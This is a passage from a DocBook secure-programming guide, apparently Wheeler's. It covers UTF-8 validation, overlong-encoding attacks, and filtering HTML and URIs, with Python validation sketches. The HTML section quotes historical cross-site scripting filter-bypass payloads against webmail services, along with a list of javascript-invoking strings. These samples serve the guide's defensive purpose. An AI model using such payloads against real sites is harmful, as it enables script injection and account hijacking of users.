have the same encoding under both ASCII and UTF-8.
|
||
This is fabulous for backward compatibility with the many existing
|
||
U.S. programs and data files.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
All UCS characters beyond 0x7f are encoded as a multibyte
|
||
sequence consisting only of bytes in the range 0x80 to 0xfd.
|
||
This means that no ASCII byte can appear as part of another
|
||
character. Many other encodings permit characters such as an
|
||
embedded NUL byte, causing programs to fail.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
It's easy to convert between UTF-8 and a 2-byte or 4-byte
fixed-width representation of characters (these are called
|
||
UCS-2 and UCS-4 respectively).
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
The lexicographic sorting order of UCS-4 strings is preserved,
|
||
and the Boyer-Moore fast search algorithm can be used directly
|
||
with UTF-8 data.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
All possible 2^31 UCS codes can be encoded using UTF-8.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
The first byte of a multibyte sequence which represents
|
||
a single non-ASCII UCS character is always in the range
|
||
0xc0 to 0xfd and indicates how long this multibyte
|
||
sequence is. All further bytes in a multibyte sequence
|
||
are in the range 0x80 to 0xbf. This allows easy resynchronization;
|
||
if a byte is missing, it's easy to skip forward to the ``next''
|
||
character, and it's always easy to skip forward and back to the
|
||
``next'' or ``preceding'' character.
|
||
</para></listitem>
|
||
|
||
</itemizedlist>
|
||
</para>
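<para>
Several of these properties are easy to observe directly.
The short Python sketch below uses only the language's built-in UTF-8
encoder; the helper names are hypothetical and exist only for this
illustration.
</para>

```python
def utf8_length(ch: str) -> int:
    """Number of bytes used to encode one character in UTF-8."""
    return len(ch.encode("utf-8"))


def is_continuation(byte: int) -> bool:
    """True for the non-leading bytes (0x80 to 0xBF) of a multibyte sequence."""
    return 0x80 <= byte <= 0xBF


def next_char_start(data: bytes, i: int) -> int:
    """Index of the first character boundary after position i."""
    i += 1
    while i < len(data) and is_continuation(data[i]):
        i += 1
    return i


def sort_order_preserved(words: list) -> bool:
    """True if sorting by code point and sorting by UTF-8 bytes agree."""
    by_bytes = sorted(w.encode("utf-8") for w in words)
    return sorted(words) == [b.decode("utf-8") for b in by_bytes]
```

<para>
For instance, utf8_length() gives 1 for ``A'', 2 for U+00E9, 3 for U+20AC,
and 4 for U+10348, and next_char_start() finds the following character
boundary even when it starts in the middle of a multibyte sequence.
</para>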
|
||
|
||
|
||
<para>
|
||
In short, the UTF-8 transformation format is becoming a dominant method
|
||
for exchanging international text information because it can support all of the
|
||
world's languages, yet it is backward compatible with U.S. ASCII files
|
||
as well as having other nice properties.
|
||
For many purposes I recommend its use, particularly when storing data
|
||
in a ``text'' file.
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="utf8-security-issues">
|
||
<title>UTF-8 Security Issues</title>
|
||
|
||
|
||
<para>
|
||
The reason to mention UTF-8 is that
|
||
some byte sequences are not legal UTF-8, and
|
||
this might be an exploitable security hole.
|
||
UTF-8 encoders are supposed to use the ``shortest possible''
|
||
encoding, but naive decoders may accept encodings that are longer than
|
||
necessary.
|
||
Indeed, earlier standards permitted decoders to accept
|
||
``non-shortest form'' encodings.
|
||
The problem here is that this means that potentially dangerous
|
||
input could be represented multiple ways, and thus might
|
||
defeat the security routines checking for dangerous inputs.
|
||
The RFC describes the problem this way:
|
||
|
||
<blockquote>
|
||
<para>
|
||
Implementers of UTF-8 need to consider the security aspects of how
|
||
they handle illegal UTF-8 sequences. It is conceivable that in some
|
||
circumstances an attacker would be able to exploit an incautious
|
||
UTF-8 parser by sending it an octet sequence that is not permitted by
|
||
the UTF-8 syntax.
|
||
</para>
|
||
|
||
<para>
|
||
A particularly subtle form of this attack could be carried out
|
||
against a parser which performs security-critical validity checks
|
||
against the UTF-8 encoded form of its input, but interprets certain
|
||
illegal octet sequences as characters. For example, a parser might
|
||
prohibit the NUL character when encoded as the single-octet sequence
|
||
00, but allow the illegal two-octet sequence C0 80 (illegal because
|
||
it's longer than necessary) and interpret it
|
||
as a NUL character (00). Another example might be a parser which
|
||
prohibits the octet sequence 2F 2E 2E 2F ("/../"), yet permits the
|
||
illegal octet sequence 2F C0 AE 2E 2F.
|
||
</para>
|
||
</blockquote>
|
||
|
||
</para>
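<para>
The defense is to decode strictly first and run the security checks on the
decoded characters, never on the raw bytes.
A minimal Python sketch follows; Python's built-in UTF-8 decoder rejects
non-shortest forms, while the function name decode_then_check and the
particular forbidden sequences are assumptions taken from the RFC's examples.
</para>

```python
def decode_then_check(raw: bytes) -> str:
    """Decode raw as strict UTF-8, then apply checks to the decoded text."""
    # Raises UnicodeDecodeError for illegal sequences such as C0 80 or C0 AE.
    text = raw.decode("utf-8", errors="strict")
    # Checks run on characters, so each one has a single representation.
    if "\x00" in text or "/../" in text:
        raise ValueError("forbidden sequence in input")
    return text
```

<para>
Both of the RFC's example attacks (C0 80 and 2F C0 AE 2E 2F) fail in the
decoding step, before the checks for NUL and ``/../'' are even reached.
</para>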
|
||
|
||
<para>
|
||
A longer discussion about this is available at
|
||
Markus Kuhn's
|
||
<emphasis remap="it">UTF-8 and Unicode FAQ for Unix/Linux</emphasis> at
|
||
<ulink
|
||
url="http://www.cl.cam.ac.uk/~mgk25/unicode.html">http://www.cl.cam.ac.uk/~mgk25/unicode.html</ulink>.
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="utf8-legal-values">
|
||
<title>UTF-8 Legal Values</title>
|
||
|
||
<para>
|
||
Thus, when accepting UTF-8 input, you need to check if the input is
|
||
valid UTF-8.
|
||
Here is a list of all legal UTF-8 sequences; any character
|
||
sequence not matching this table is not a legal UTF-8 sequence.
|
||
In the following table, the first column shows the various character
|
||
values being encoded into UTF-8.
|
||
The second column shows how those characters are encoded as binary values;
|
||
an ``x'' indicates where the data is placed (either a 0 or 1), though
|
||
some values should not be allowed because they're not the shortest possible
|
||
encoding.
|
||
The last column shows the valid values each byte can have
|
||
(in hexadecimal).
|
||
Thus, a program should check that every character meets one of the patterns
|
||
in the right-hand column.
|
||
A ``-'' indicates a range of legal values (inclusive).
|
||
Of course, just because a sequence is a legal UTF-8 sequence doesn't
|
||
mean that you should accept it (you still need to do all your other
|
||
checking), but generally you should check any UTF-8 data for UTF-8 legality
|
||
before performing other checks.
|
||
<table>
|
||
<title>Legal UTF-8 Sequences</title>
|
||
<tgroup cols="3">
|
||
<colspec colname="UCS">
|
||
<colspec colname="binary-range">
|
||
<colspec colname="hex">
|
||
<thead>
|
||
<row><entry>UCS Code (Hex)</entry><entry>Binary UTF-8 Format</entry><entry>Legal UTF-8 Values (Hex)</entry></row>
|
||
</thead>
|
||
<tbody>
|
||
<row><entry>00-7F</entry><entry>0xxxxxxx</entry><entry>00-7F</entry></row>
|
||
<row><entry>80-7FF</entry><entry>110xxxxx 10xxxxxx</entry><entry>C2-DF 80-BF</entry></row>
|
||
<row><entry>800-FFF</entry><entry>1110xxxx 10xxxxxx 10xxxxxx</entry><entry>E0 A0*-BF 80-BF</entry></row>
|
||
<row><entry>1000-FFFF</entry><entry>1110xxxx 10xxxxxx 10xxxxxx</entry><entry>E1-EF 80-BF 80-BF</entry></row>
|
||
<row><entry>10000-3FFFF</entry> <entry>11110xxx 10xxxxxx 10xxxxxx 10xxxxxx</entry><entry>F0 90*-BF 80-BF 80-BF</entry></row>
|
||
<row><entry>40000-FFFFF</entry><entry>11110xxx 10xxxxxx 10xxxxxx 10xxxxxx</entry><entry>F1-F3 80-BF 80-BF 80-BF</entry></row>
<row><entry>100000-10FFFF</entry><entry>11110xxx 10xxxxxx 10xxxxxx 10xxxxxx</entry><entry>F4 80-8F* 80-BF 80-BF</entry></row>
<row><entry>200000-3FFFFFF</entry><entry>111110xx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx</entry><entry>too large; see below</entry></row>
<row><entry>4000000-7FFFFFFF</entry><entry>1111110x 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx</entry><entry>too large; see below</entry></row>
|
||
</tbody>
|
||
</tgroup>
|
||
</table>
|
||
</para>
|
||
<!-- From: http://www.unicode.org/unicode/uni2errata/UTF-8_Corrigendum.html -->
|
||
|
||
<para>
|
||
As I noted earlier, there are two standards for character sets,
ISO 10646 and Unicode, whose maintainers have agreed to synchronize their
character assignments.
The definitions of UTF-8 in ISO/IEC 10646-1:2000 and the IETF RFC
also currently support
five and six byte sequences to encode characters outside the range
supported by the Unicode Consortium's Unicode, but such values can't be used to
support Unicode characters and it's expected that a future version of
ISO 10646 will have the same limits.
|
||
<!-- http://www.unicode.org/unicode/reports/tr27/#relation -->
|
||
Thus, for most purposes the five and six byte UTF-8 encodings aren't legal,
|
||
and you should normally reject them (unless you have a special purpose
|
||
for them).
|
||
</para>
|
||
|
||
<para>
|
||
This set of valid values is tricky to determine, and in fact
|
||
earlier versions of this document got some entries
|
||
wrong (in some cases it permitted overlong characters).
|
||
Language developers should include a function in their libraries
|
||
to check for valid UTF-8 values, just because it's so hard to get right.
|
||
</para>
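<para>
As an illustration only, the table above can be transcribed almost
mechanically into a checker.
The following Python sketch does so; the names LEGAL_SEQUENCES and
is_legal_utf8 are hypothetical, not taken from any library.
It follows the table exactly, so like the table it accepts ED A0-BF
lead sequences (the UTF-16 surrogate range), which current Unicode
treats as ill-formed; tighten that row if your application needs to.
</para>

```python
# Each entry: (range of the first byte, ranges of the bytes that follow),
# transcribed from the "Legal UTF-8 Values (Hex)" column of the table.
LEGAL_SEQUENCES = [
    ((0x00, 0x7F), []),
    ((0xC2, 0xDF), [(0x80, 0xBF)]),
    ((0xE0, 0xE0), [(0xA0, 0xBF), (0x80, 0xBF)]),
    ((0xE1, 0xEF), [(0x80, 0xBF), (0x80, 0xBF)]),
    ((0xF0, 0xF0), [(0x90, 0xBF), (0x80, 0xBF), (0x80, 0xBF)]),
    ((0xF1, 0xF3), [(0x80, 0xBF), (0x80, 0xBF), (0x80, 0xBF)]),
    ((0xF4, 0xF4), [(0x80, 0x8F), (0x80, 0xBF), (0x80, 0xBF)]),
]


def is_legal_utf8(data: bytes) -> bool:
    """Return True if data consists only of sequences listed in the table."""
    i = 0
    while i < len(data):
        for (lo, hi), tail in LEGAL_SEQUENCES:
            if lo <= data[i] <= hi:
                break
        else:
            # C0, C1, F5-FF, or a continuation byte where a first byte belongs.
            return False
        following = data[i + 1:i + 1 + len(tail)]
        if len(following) != len(tail):
            return False  # sequence is cut off by the end of the input
        for byte, (lo, hi) in zip(following, tail):
            if not lo <= byte <= hi:
                return False
        i += 1 + len(tail)
    return True
```

<para>
Five and six byte sequences are rejected simply because no row of the
table starts with F8-FD.
</para>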
|
||
|
||
<para>
|
||
I should note that in some cases, you might want to tolerate (or use
internally) the hexadecimal sequence C0 80. This is an overlong sequence
that, if permitted, can represent ASCII NUL. Since C and C++
have trouble including a NUL character in an ordinary string,
some people have taken
to using this sequence when they want to represent NUL as part of the
data stream; Java even enshrines the practice.
|
||
Feel free to use C0 80 internally while processing data, but technically
|
||
you really should translate this back to 00 before saving the data.
|
||
Depending on your needs, you might decide to be ``sloppy'' and accept
|
||
C0 80 as input in a UTF-8 data stream.
|
||
If it doesn't harm security, it's probably a good practice to accept this
|
||
sequence since accepting it aids interoperability.
|
||
</para>
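<para>
If you do decide to accept C0 80 on input, one possible approach is to
translate it back to 00 first and then apply a strict check to everything else.
The Python sketch below assumes that policy; the function name
decode_accepting_c0_80 is hypothetical.
It relies on the fact that the byte C0 never appears in legal UTF-8, so
the replacement cannot change any legal sequence.
</para>

```python
def decode_accepting_c0_80(data: bytes) -> str:
    """Decode UTF-8 strictly, except that C0 80 is accepted as NUL (00)."""
    # C0 is not a legal first byte and is outside the continuation range
    # 80-BF, so this replacement only ever touches the overlong NUL form.
    normalized = data.replace(b"\xc0\x80", b"\x00")
    # Strict decoding raises UnicodeDecodeError on any other illegal bytes.
    return normalized.decode("utf-8", errors="strict")
```

<para>
Any other overlong form (for example C0 AF) still raises an error, so
the ``sloppiness'' is limited to the one sequence discussed here.
</para>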
|
||
|
||
<para>
|
||
Handling this can be tricky.
|
||
You might want to examine the C routines developed by Unicode to
|
||
handle conversions, available at
|
||
<ulink url="ftp://ftp.unicode.org/Public/PROGRAMS/CVTUTF/ConvertUTF.c">
|
||
ftp://ftp.unicode.org/Public/PROGRAMS/CVTUTF/ConvertUTF.c</ulink>.
|
||
It's unclear to me if these routines are open source software (the
|
||
licenses don't clearly say whether or not they can be modified), so
|
||
beware of that.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
|
||
<sect2 id="utf8-related-issues">
|
||
<title>UTF-8 Related Issues</title>
|
||
|
||
<para>
|
||
This section has discussed UTF-8, because it's the most popular
|
||
multibyte encoding of UCS, simplifying a lot of international text
|
||
handling issues.
|
||
However, it's certainly not the only encoding; there are other encodings,
|
||
such as UTF-16 and UTF-7, which have the same kinds of issues and
|
||
must be validated for the same reasons.
|
||
</para>
|
||
|
||
<para>
|
||
Another issue is that some phrases can be expressed in more than one
|
||
way in ISO 10646/Unicode.
|
||
For example, some accented characters can be represented as a single
|
||
character (with the accent) and also as a set of characters
|
||
(e.g., the base character plus a separate composing accent).
|
||
These two forms may appear identical.
|
||
There's also a zero-width space that could be inserted, with the
|
||
result that apparently-similar items are considered different.
|
||
Beware of situations where such hidden text could interfere with the program.
|
||
This is an issue that in general is hard to solve; most programs don't
|
||
have such tight control over the clients that they know completely how
|
||
a particular sequence will be displayed (since this depends on the
|
||
client's font, display characteristics, locale, and so on).
|
||
</para>
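<para>
When two strings must be compared (for example, user names or file names),
one partial defense is to normalize both before comparing.
The following Python sketch uses the standard unicodedata module;
the helper name canonical_key, the choice of normalization form NFC, and
the decision to drop the zero-width space are assumptions of this
example, not a general recommendation.
It does nothing about characters that merely look alike in a given font.
</para>

```python
import unicodedata

ZERO_WIDTH_SPACE = "\u200b"


def canonical_key(text: str) -> str:
    """Return a form of text intended only for equality comparisons."""
    # Dropping U+200B and applying NFC are policy choices of this sketch.
    without_zwsp = text.replace(ZERO_WIDTH_SPACE, "")
    return unicodedata.normalize("NFC", without_zwsp)


composed = "caf\u00e9"        # e-acute as a single character
decomposed = "cafe\u0301"     # 'e' followed by a combining acute accent
hidden = "ca\u200bf\u00e9"    # zero-width space inside the word

print(composed == decomposed)                                # False
print(canonical_key(composed) == canonical_key(decomposed))  # True
print(canonical_key(composed) == canonical_key(hidden))      # True
```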
|
||
|
||
</sect2>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="input-protection-cross-site">
|
||
<title>Prevent Cross-site Malicious Content on Input</title>
|
||
|
||
<para>
|
||
Some programs accept data from one untrusted user and pass that data
|
||
on to a second user; the second user's application may then process that
|
||
data in a way harmful to the second user.
|
||
This is a particularly common problem for web applications;
we'll call this problem ``cross-site malicious content.''
|
||
In short, you cannot accept input (including any form data)
|
||
without checking, filtering, or encoding it.
|
||
For more information, see
|
||
<xref linkend="cross-site-malicious-content">.
|
||
</para>
|
||
|
||
<para>
|
||
Fundamentally, this means that all web application input must be
|
||
filtered (so characters that can cause this problem are removed),
|
||
encoded (so the characters that can cause this problem are encoded in
|
||
a way to prevent the problem), or
|
||
validated (to ensure that only ``safe'' data gets through).
|
||
Filtering and validation should often be done at the input, but
|
||
encoding can be done either at input or output time.
|
||
If you're just passing the data through without analysis, it's probably
|
||
better to encode the data on input (so it won't be forgotten), but
|
||
if you're processing the data, there are arguments for encoding on
|
||
output instead.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
|
||
<sect1 id="filter-html">
|
||
<title>Filter HTML/URIs That May Be Re-presented</title>
|
||
|
||
<para>
|
||
One special case where cross-site malicious content must be
prevented is web applications
that are designed to accept HTML or XHTML from one user, and then send it on
to other users
|
||
(see <xref linkend="cross-site-malicious-content"> for
|
||
more information on cross-site malicious content).
|
||
The following subsections discuss filtering this specific kind of input,
|
||
since handling it is such a common requirement.
|
||
</para>
|
||
|
||
<sect2 id="remove-html-tags">
|
||
<title>Remove or Forbid Some HTML Data</title>
|
||
|
||
<para>
|
||
It's safest to remove all possible (X)HTML tags so they cannot affect anything,
|
||
and this is relatively easy to do.
|
||
As noted above, you should already be identifying the list of legal
|
||
characters, and rejecting or removing those characters that aren't
|
||
in the list.
|
||
In this filter, simply don't include the following characters in
|
||
the list of legal characters: ``<'', ``>'', and ``&'' (and if
|
||
they're used in attributes, the double-quote character ``"'').
|
||
If browsers only operated according to the HTML specifications, the ``>''
wouldn't need to be removed, but in practice it must be removed.
This is because some browsers assume that the author of the page
really meant to put in an opening ``<'' and ``helpfully'' insert one -
attackers can exploit this behavior and use the ``>'' to create an
undesired ``<''.
|
||
<!-- CERT http://www.cert.org/tech_tips/malicious_code_mitigation.html -->
|
||
</para>
|
||
|
||
<para>
|
||
Usually the character set for transmitting HTML is
|
||
ISO-8859-1 (even when sending international text),
|
||
so the filter should also omit most control characters (linefeed and
|
||
tab are usually okay) and characters with their high-order bit set.
|
||
</para>
|
||
|
||
<para>
|
||
One problem with this approach is that it can really surprise users,
|
||
especially those entering international text if all international
|
||
text is quietly removed.
|
||
If the invalid characters are quietly removed without warning,
|
||
that data will be irrevocably lost and cannot be reconstructed later.
|
||
One alternative is forbidding such characters and sending error messages
|
||
back to users who attempt to use them.
|
||
This at least warns users, but doesn't give them the functionality
|
||
they were looking for.
|
||
Other alternatives are encoding this data or validating this data,
|
||
which are discussed next.
|
||
</para>
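<para>
The ``forbid and report'' alternative might be sketched as follows in Python.
The legal list used here (printable ASCII plus linefeed and tab, minus
the four HTML-special characters) and the names LEGAL_CHARS,
illegal_characters, and check_comment are assumptions made for this
example; a real application would choose its own list.
</para>

```python
import string

# Assumed policy: printable ASCII plus linefeed and tab,
# minus the characters that are special in HTML.
LEGAL_CHARS = (
    set(string.ascii_letters + string.digits + string.punctuation + " \n\t")
    - set('<>&"')
)


def illegal_characters(text: str) -> list:
    """Return the distinct characters in text that are not on the legal list."""
    return sorted({ch for ch in text if ch not in LEGAL_CHARS})


def check_comment(text: str) -> str:
    """Return text unchanged, or raise ValueError naming the bad characters."""
    bad = illegal_characters(text)
    if bad:
        raise ValueError(
            "characters not permitted: " + " ".join(repr(ch) for ch in bad)
        )
    return text
```

<para>
Because the function reports which characters were refused instead of
silently dropping them, the user at least learns why the input was rejected.
</para>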
|
||
</sect2>
|
||
|
||
<sect2 id="encoding-html-tags">
|
||
<title>Encoding HTML Data</title>
|
||
|
||
<para>
|
||
An alternative that is nearly as safe
|
||
is to transform the critical characters so they won't
|
||
have their usual meaning in HTML.
|
||
This can be done by translating all "<" into "&lt;",
|
||
">" into "&gt;", and "&" into "&amp;".
|
||
Arbitrary international characters can be encoded in Latin-1
|
||
using the format "&#value;" - do not forget the ending semicolon.
|
||
Encoding the international characters means you must know what the
|
||
input encoding was, of course.
|
||
</para>
|
||
|
||
<para>
|
||
One possible danger here is that if these encodings are accidentally
|
||
interpreted twice, they will become a vulnerability.
|
||
However, this approach at least permits later users to see the
|
||
"intent" of the input.
|
||
</para>
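<para>
In Python, for instance, the encoding step can be sketched with the
standard html module; the wrapper name encode_for_html is hypothetical.
The sketch assumes the input has already been decoded into a Python
string, so the input encoding is known, and that the result is inserted
into the page exactly once.
</para>

```python
import html


def encode_for_html(text: str) -> str:
    """Encode text so that it displays literally in an HTML page."""
    # html.escape turns & < > into entities; quote=True also covers " and '.
    escaped = html.escape(text, quote=True)
    # xmlcharrefreplace rewrites every non-ASCII character as &#value;
    return escaped.encode("ascii", "xmlcharrefreplace").decode("ascii")


print(encode_for_html('<b>caf\u00e9 & "tea"</b>'))
# prints: &lt;b&gt;caf&#233; &amp; &quot;tea&quot;&lt;/b&gt;
```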
|
||
</sect2>
|
||
|
||
<sect2 id="Validating-html-tags">
|
||
<title>Validating HTML Data</title>
|
||
|
||
<para>
|
||
Some applications, to work at all, must accept HTML from third parties
and send it on to their users.
|
||
Beware - you are treading dangerous ground at this point; be sure
|
||
that you really want to do this.
|
||
Even the idea of accepting HTML from arbitrary places
|
||
is controversial among some security practitioners, because it is extremely
|
||
difficult to get it right.
|
||
</para>
|
||
|
||
<para>
|
||
However, if your application must accept HTML, and you believe
|
||
that it's worth the risk, at least identify a list
|
||
of ``safe'' HTML commands and only permit those commands.
|
||
</para>
|
||
|
||
<para>
|
||
Here is a minimal set of safe HTML tags
|
||
that might be useful for applications (such as guestbooks)
|
||
that support short comments:
|
||
<p> (paragraph),
|
||
<b> (bold),
|
||
<i> (italics),
|
||
<em> (emphasis),
|
||
<strong> (strong emphasis),
|
||
<pre> (preformatted text),
|
||
<br> (forced line break - note it doesn't require a closing tag),
|
||
as well as all their ending tags.
|
||
</para>
|
||
|
||
<para>
|
||
Not only do you need to ensure that only a small set
|
||
of ``safe'' HTML commands are accepted, you also need to ensure
|
||
that they are properly nested and closed
|
||
(i.e., that the HTML commands are ``balanced'').
|
||
In XML, this is termed ``well-formed'' data.
|
||
A few exceptions could be made if you're accepting standard HTML
|
||
(e.g., supporting an implied </p> where not provided before a
|
||
<p> would be fine), but trying to accept HTML in its full
|
||
generality (which can infer balancing closing tags in many cases)
|
||
is not needed for most applications.
|
||
Indeed, if you're trying to stick to XHTML (instead of HTML), then
|
||
well-formedness is a requirement.
|
||
Also, HTML tags are case-insensitive; tags can be upper case,
|
||
lower case, or a mixture.
|
||
However, if you intend to accept XHTML
|
||
then you need to require all tags to be in lower case
|
||
(XML is case-sensitive; XHTML uses XML and requires the tags to be
|
||
in lower case).
|
||
</para>
|
||
|
||
<para>
|
||
Here are a few random tips about doing this.
|
||
Usually you should design whatever surrounds the HTML text and the
|
||
set of permitted tags so that the contributed text cannot be misinterpreted
|
||
as text from the ``main'' site (to prevent forgeries).
|
||
Don't accept any attributes unless you've checked the attribute type and
|
||
its value; there are many attributes that support things such as
|
||
Javascript that can cause trouble for your users.
|
||
You'll notice that in the above list I didn't include any attributes at all,
|
||
which is certainly the safest course.
|
||
You should probably give a warning message if an unsafe tag is used,
|
||
but if that's not practical, encoding the critical characters
|
||
(e.g., "<" becomes "&lt;") prevents data loss while
|
||
simultaneously keeping the users safe.
|
||
</para>
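<para>
To make the idea concrete, here is a small Python sketch of a checker
for the minimal tag set listed above.
It is deliberately restrictive and is not a general HTML parser: it
accepts a tag only if it is written with no attributes and no
whitespace, treats tag names case-insensitively (as in HTML, not XHTML),
requires every tag except br to be closed in the right order, and
rejects any stray ``<'', ``>'', or ``&'' in the text between tags.
The names SAFE_TAGS, VOID_TAGS, and is_safe_html are hypothetical, and
rejecting a bare ``&'' is an assumption of this sketch.
</para>

```python
import re

SAFE_TAGS = {"p", "b", "i", "em", "strong", "pre", "br"}
VOID_TAGS = {"br"}  # no closing tag expected
# A permitted tag is "<name>" or "</name>" with nothing else inside.
TAG = re.compile(r"<(/?)([A-Za-z]+)>")
MARKUP_CHAR = re.compile(r"[<>&]")


def is_safe_html(text: str) -> bool:
    """Accept only attribute-free safe tags that are properly nested."""
    open_tags = []
    pos = 0
    for match in TAG.finditer(text):
        # Text between recognized tags must not contain markup characters.
        if MARKUP_CHAR.search(text[pos:match.start()]):
            return False
        pos = match.end()
        closing, name = match.group(1), match.group(2).lower()
        if name not in SAFE_TAGS:
            return False
        if name in VOID_TAGS:
            if closing:
                return False
        elif closing:
            if not open_tags or open_tags.pop() != name:
                return False
        else:
            open_tags.append(name)
    if MARKUP_CHAR.search(text[pos:]):
        return False
    return not open_tags  # every opened tag must have been closed
```

<para>
Input that fails the check can then be refused with a warning or passed
through the character encoding described earlier.
</para>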
|
||
|
||
<para>
|
||
Be careful when expanding this set, and in general be restrictive of
|
||
what you accept.
|
||
If your patterns are too generous, the browser may interpret the
|
||
sequences differently than you expect, resulting in a potential
|
||
exploit.
|
||
For example, FozZy posted on Bugtraq (1 April 2002)
|
||
some sequences that permitted
|
||
exploitation in various web-based mail systems,
|
||
which may give you an idea of the kinds of problems you need to defend
|
||
against.
|
||
Here's some exploit text that, at one time, could
|
||
subvert user accounts in Microsoft Hotmail:
|
||
<programlisting>
|
||
<![CDATA[
|
||
<SCRIPT>
|
||
</COMMENT>
|
||
<!-- --> -->
|
||
]]>
|
||
</programlisting>
|
||
Here's some similar exploit text for Yahoo! Mail:
|
||
<programlisting>
|
||
<![CDATA[
|
||
<_a<script>
|
||
<<script> (Note: this was found by BugSan)
|
||
]]>
|
||
</programlisting>
|
||
Here's some exploit text for Vizzavi:
|
||
<programlisting>
|
||
<![CDATA[
|
||
<b onmousover="...">go here</b>
|
||
<img [line_break] src="javascript:alert(document.location)">
|
||
]]>
|
||
</programlisting>
|
||
|
||
Andrew Clover posted to Bugtraq (on May 11, 2002) a list of various
|
||
text that invokes Javascript yet manages to bypass many filters.
|
||
Here are his examples (which he says he cut and pasted from elsewhere);
|
||
some only apply to specific browsers
|
||
(IE means Internet Explorer, N4 means Netscape version 4).
|
||
<programlisting>
|
||
<![CDATA[
|
||
<a href="javascript:[code]">
|
||
<div onmouseover="[code]">
|
||
<img src="javascript:[code]">
|
||
<img dynsrc="javascript:[code]"> [IE]
|
||
<input type="image" dynsrc="javascript:[code]"> [IE]
|
||
<bgsound src="javascript:[code]"> [IE]
|
||
&<script>[code]</script>
|
||
&{[code]}; [N4]
|
||
<img src=&{[code]};> [N4]
|
||
<link rel="stylesheet" href="javascript:[code]">
|
||
<iframe src="vbscript:[code]"> [IE]
|
||
<img src="mocha:[code]"> [N4]
|
||
<img src="livescript:[code]"> [N4]
|
||
<a href="about:<script>[code]</script>">
|
||
<meta http-equiv="refresh" content="0;url=javascript:[code]">
|
||
<body onload="[code]">
|
||
<div style="background-image: url(javascript:[code]);">
|
||
<div style="behaviour: url([link to code]);"> [IE]
|
||
<div style="binding: url([link to code]);"> [Mozilla]
|
||
<div style="width: expression([code]);"> [IE]
|
||
<style type="text/javascript">[code]</style> [N4]
|
||
<object classid="clsid:..." codebase="javascript:[code]"> [IE]
|
||
<style><!--</style><script>[code]//--></script>
|
||
<!-- -- --><script>[code]</script><!-- -- -->
|
||
<<script>[code]</script>
|
||
<img src="blah"onmouseover="[code]">
|
||
<img src="blah>" onmouseover="[code]">
|
||
<xml src="javascript:[code]">
|
||
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
|
||
<div datafld="b" dataformatas="html" datasrc="#X"></div>
|
||
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]
|
||
<![CDATA[<!--]] ><script>[code]//--></script>
|
||
|
||
]]>
|
||
<!-- I inserted a space after ]] just above. -->
|
||
</programlisting>
|
||
This is not a complete list, of course, but it at least is a sample
|
||
of the kinds of attacks that you must prevent by strictly limiting the
|
||
tags and attributes you can allow from untrusted users.
|
||
</para>
|
||
<para>
|
||
Konstantin Riabitsev has posted
|
||
<ulink url="http://www.mricon.com/html/phpfilter.html">
|
||
some PHP code to filter HTML</ulink> (GPL);
|
||
I've not examined it closely, but you might want to take a look.
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="Validating-uris">
|
||
<title>Validating Hypertext Links (URIs/URLs)</title>
|
||
|
||
<para>
|
||
Careful readers will notice that I did not include the hypertext link tag
|
||
<a> as a safe tag in HTML.
|
||
Clearly, you could add
|
||
<a href="safe URI"> (hypertext link) to the safe list
|
||
(not permitting any other attributes unless you've checked their
|
||
contents).
|
||
If your application requires it, then do so.
|
||
However, permitting third parties to create links
|
||
is much less safe, because defining a ``safe URI''<footnote>
|
||
<para>
|
||
Technically, a hypertext link can be any ``uniform resource
|
||
identifier'' (URI).
|
||
The term "Uniform Resource Locator" (URL) refers to the subset of URIs
|
||
that identify resources via a representation of their primary access
|
||
mechanism (e.g., their network "location"), rather than identifying
|
||
the resource by name or by some other attribute(s) of that resource.
|
||
Many people use the term ``URL'' as synonymous with ``URI'', since URLs
|
||
are the most common kind of URI.
|
||
For example, the encoding used in URIs is actually called ``URL encoding''.
|
||
</para>
|
||
</footnote>
|
||
turns out to be very difficult.
|
||
Many browsers accept
|
||
all sorts of URIs which may be dangerous to the user.
|
||
This section discusses how to validate URIs from third parties for
|
||
re-presenting to others, including URIs incorporated into HTML.
|
||
</para>
|
||
|
||
<para>
|
||
First, let's look briefly at URI syntax (as defined by various specifications).
|
||
URIs can be either ``absolute'' or ``relative''.
|
||
The syntax of an absolute URI looks like this:
|
||
<programlisting>
|
||
scheme://authority[path][?query][#fragment]
|
||
</programlisting>
|
||
A URI starts with a scheme name (such as ``http''), the characters ``://'',
|
||
the authority (such as ``www.dwheeler.com''), a path
|
||
(which looks like a directory or file name), a question mark followed by
|
||
a query, and a hash (``#'') followed by a fragment identifier.
|
||
The square brackets surround optional portions - e.g., many URIs don't
|
||
actually include the query or fragment.
|
||
Some schemes may not permit some of the data (e.g., paths, queries, or
|
||
fragments), and many schemes have additional requirements unique to them.
|
||
Many schemes permit the ``authority'' field to identify
|
||
optional usernames, passwords, and ports, using this syntax for the
|
||
``authority'' section:
|
||
<programlisting>
|
||
[username[:password]@]host[:portnumber]
|
||
</programlisting>
|
||
The ``host'' can either be a name (``www.dwheeler.com'') or an IPv4
|
||
numeric address (127.0.0.1).
|
||
A ``relative'' URI references one object relative to the ``current'' one,
|
||
and its syntax looks a lot like a filename:
|
||
<programlisting>
|
||
path[?query][#fragment]
|
||
</programlisting>
|
||
There are a limited number of characters permitted in most of the URI,
|
||
so to get around this problem, other 8-bit characters may be ``URL encoded''
|
||
as %hh (where hh is the hexadecimal value of the 8-bit character).
|
||
For more detailed information on valid URIs, see IETF RFC 2396 and its
|
||
related specifications.
|
||
</para>
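<para>
As a quick illustration of these parts, Python's standard
urllib.parse module can split a URI along the same lines.
The URI below, including its username and password, is made up for the example.
</para>

```python
from urllib.parse import urlsplit, unquote

parts = urlsplit(
    "http://alice:secret@www.dwheeler.com:8080/a%20b/index.html?x=1#top"
)

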